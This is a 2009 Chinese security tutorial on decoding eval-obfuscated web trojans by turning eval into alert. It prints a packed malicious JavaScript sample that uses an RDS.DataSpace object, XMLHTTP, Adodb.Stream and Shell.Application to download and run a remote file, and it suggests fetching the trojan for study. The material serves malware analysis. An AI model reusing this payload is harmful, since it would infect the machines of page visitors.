网马解密大讲堂——网马解密中级篇(Eval篇)
来源:ikaka.com 时间:2009-09-16 16:04:00
阅读上一篇:Freshow工具使用方法
一. eval加密是在网马解密中最常见的,eval在jscript脚本中实际上是一个函数,简单可以理解为执行语句的的意思。
Eval方法
参数 :codeString 必选。包含有效 JScript 代码的字符串。eval 函数允许动态执行 JScript 源代码。
2. eval函数特点:是将字符串转换为脚本代码,然后就可以执行了,但是,如果字符串里面还有HMTL标签的话,它就不能执行了。
二. Eval解密方法之alert方法:
alert函数:
在要对eval解密之前首先需要了解一下alert这个函数,大家可能有个疑问,在解马的过程中怎样才能保证自身系统安全而又不中招呢,我们知道要是直接去访问一些经过加密的网马地址,就相当于在电脑上直接运行了网马。既要能将网马解出,又要保证系统的安全。这时我们就要用到alert这个函数。
alert函数在jscript中有弹出消息内容的作用,我们正是可以利用这一特性,来保证在解马的过程中不会中招。请看下面一个小例子:
<script>alert("你好!")</script>将此段代码,粘贴至记事本中保存为htm格式(文件名随意),直接运行后可看到alert函数的效果。
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 z,y,x,v,w;B=\'C://I.u/F/D.E\';1 J=\'4.n\';1 i=\'4.h\';1 j=f["g"]["s"]("q");1 8="p:";1 9="0-k-0";1 7="l";1 5="G";1 2="N";1 c="Z-W-Y";1 K="U.X"+"M"+"L"+"H"+"T"+"T"+"P";1 V="A"+"d"+"o"+"d"+"b."+"S"+"t"+"r"+"e"+"a"+"m";1 3="O.";1 6="Q";1 R=3+6;1 2=8+2+c+9+7+5;',62,62,'|var|Gameeeeex|ying|Gameeeeee|Gameeeeesss|yings|Gameeeeess|Gameeeee|Gameeeees|||Gameeeeexx|||window|document|vbs|Gameeenames|chilam|983A|0C04||pif||clsid|object||createElement||com|wwwGameeecn|wwwGameeecn2|Gameeezfx|Gameeezfs|Gameeezf||Gameee|http|f5|css|xia|FC29E36||haoxia18|Gameeename|Gameeexml|||BD96C|Shell||Application|yingx|||Microsoft|Gameeeado|65A3||11D|556'.split('|'),0,{}))
将此段代码复制粘贴至记事本中,将其中的eval修改为alert其余内容不变,但要加上<script></script>实际变为一个脚本。保存为htm(文件名任意)处理后的代码如下:
<script>
alert(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 z,y,x,v,w;B=\'C://I.u/F/D.E\';1 J=\'4.n\';1 i=\'4.h\';1 j=f["g"]["s"]("q");1 8="p:";1 9="0-k-0";1 7="l";1 5="G";1 2="N";1 c="Z-W-Y";1 K="U.X"+"M"+"L"+"H"+"T"+"T"+"P";1 V="A"+"d"+"o"+"d"+"b."+"S"+"t"+"r"+"e"+"a"+"m";1 3="O.";1 6="Q";1 R=3+6;1 2=8+2+c+9+7+5;',62,62,'|var|Gameeeeex|ying|Gameeeeee|Gameeeeesss|yings|Gameeeeess|Gameeeee|Gameeeees|||Gameeeeexx|||window|document|vbs|Gameeenames|chilam|983A|0C04||pif||clsid|object||createElement||com|wwwGameeecn|wwwGameeecn2|Gameeezfx|Gameeezfs|Gameeezf||Gameee|http|f5|css|xia|FC29E36||haoxia18|Gameeename|Gameeexml|||BD96C|Shell||Application|yingx|||Microsoft|Gameeeado|65A3||11D|556'.split('|'),0,{}))
</script>
解密结果见下图,我们看到红色框内容为网马的下载地址,鼠标选中这个对话框,ctrl+a全选再ctrl+c复制,可将整个代码粘贴至记事本上。获得代码地址后,可使用下载工具直接下载网马。
![](/images/zang.png)
![](/images/jiucuo.png)
猜你喜欢
Oracle建立二进制文件索引的方法
将mysql转换到oracle必须了解的50件事
在MySQL数据库中如何来复位根用户的密码
ACCESS入门教程:用向导建立数据库
![](https://img.aspxhome.com/file/UploadPic/20081/17/20081171368486s.gif)
Sql Server 和 Access 操作数据库结构Sql语句
有故事的网页设计——Flash网站奇妙之旅
![](https://img.aspxhome.com/file/UploadPic/20111/20/a1-39s.jpg)
Sun正式发布MySQL 5.1版 简化数据库应用
影响ORACLE汉字显示的字符集问题
Web 标准设计实践:Google 的首页
懒懒交流会:ClassName的长命名 VS. 短命名
如何恢复/修复MS SQL数据库的MDF文件
最新屏蔽百度快照的方法
基本的页面设计元素布局比例
SQL 判断给定日期值(或时间段)所在星期的星期一和星期天的日期
理解SQL SERVER中的逻辑读,预读和物理读
![](https://img.aspxhome.com/file/UploadPic/20121/5/201215193329185s.png)
SQL Server 2005中数据库镜像的四个问题
ASP连接MySQL数据库代码示例
用asp编写类似搜索引擎功能的代码
CSS控制字体效果的思考
![](https://img.aspxhome.com/file/UploadPic/20072/20072311315168s.gif)